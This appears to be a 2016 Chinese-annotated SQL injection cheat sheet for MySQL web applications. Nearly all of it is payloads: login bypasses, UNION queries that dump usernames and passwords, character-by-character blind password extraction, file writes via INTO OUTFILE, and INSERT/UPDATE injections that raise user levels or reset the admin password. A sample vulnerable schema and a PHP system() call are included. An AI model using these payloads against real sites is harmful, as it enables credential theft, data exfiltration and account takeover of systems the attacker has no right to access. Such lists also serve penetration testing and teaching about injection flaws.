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2016-06-21 09:06:101346browse

' or 1=1
' or '1=1
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
' and LENGTH(password)='6(探测密码长度)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (导出文件)
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 12
select * FROM table where 3>2
select * FROM table where 2select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

例如2:灰色轨迹 变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user (),version()%20FROM%20calendar_events%20where%20eventid%20=% 2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass (),version()%20FROM%20calendar_events%20where%20eventid%20=% 2010)%20order%20by%20eventdate
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20u ser%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',password%20FROM %20user%20where%20userid=13465)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%2 0user%20where%20username='sandflee')%20order%20by%20eventdat e (查沙子的id)

(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
select * FROM article where articleid='$id' union select * FROM......(字段和数据库相同情况下,可直接提交)
select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM......(不同的情况下)

".__ "
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#

$command = "dir c:\";system($command);
select * FROM article where articleid='$id'
select * FROM article where articleid=$id
1' and 1=2 union select * from user where userid=1/* 句中变为
(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')
1 and 1=2 union select * from user where userid=1

create DATABASE `injection`
create TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) ;
insert INTO `user` VALUES (1, 'swap', 'mypass');

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";
insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";

update user SET password='$password', homepage='$homepage' where id='$id'
update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'
"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";
update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'
"update news SET Votes=Votes+1, score=score+$note where idnews='$id'";

update article SET title=$title where articleid=1 对应函数
update article SET title=DATABASE() where id=1
update article SET title=USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=SYSTEM_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=SESSION_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=CURRENT_USER() where id=1

$req = "select * FROM membres where name like '%$search%' ORDER BY name";
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (经典)
select uid FROM admins where login='' OR admin_level=1#' AND password=''
select * FROM table where msg like '%hop'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name

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